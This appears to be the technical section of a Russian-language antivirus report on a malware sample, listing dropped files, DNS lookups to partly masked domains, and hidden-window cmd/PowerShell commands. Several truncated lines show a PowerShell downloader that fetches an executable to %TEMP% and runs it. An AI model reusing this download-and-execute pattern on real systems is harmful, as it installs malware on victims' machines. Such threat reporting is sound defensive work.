Техническая информация
- $tbpzrg5 как %temp%\vejyrlrbcym.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function Qnlxpfc([String] $Tbpzrg5){(New-Object System.Net.WebClient).DownloadFile($Tbpzrg5,''%TEMP%\vejyrlrbcym.exe'');Start-Process ''%TEMP%\vejyrlrbcym.exe'';}tr...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1956
- %TEMP%\zyjxi5.bat
- %TEMP%\1410483.cvr
- 'te####owlogix.net':80
- DNS ASK te####owlogix.net
- DNS ASK pd.#####treform-muster.de
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function Qnlxpfc([String] $Tbpzrg5){(New-Object System.Net.WebClient).DownloadFile($Tbpzrg5,''%TEMP%\vejyrlrbcym.exe'');Start-Process ''%TEMP%\vejyrlrbcym.exe'';}tr...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\zyjxi5.bat" "' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\zyjxi5.bat" "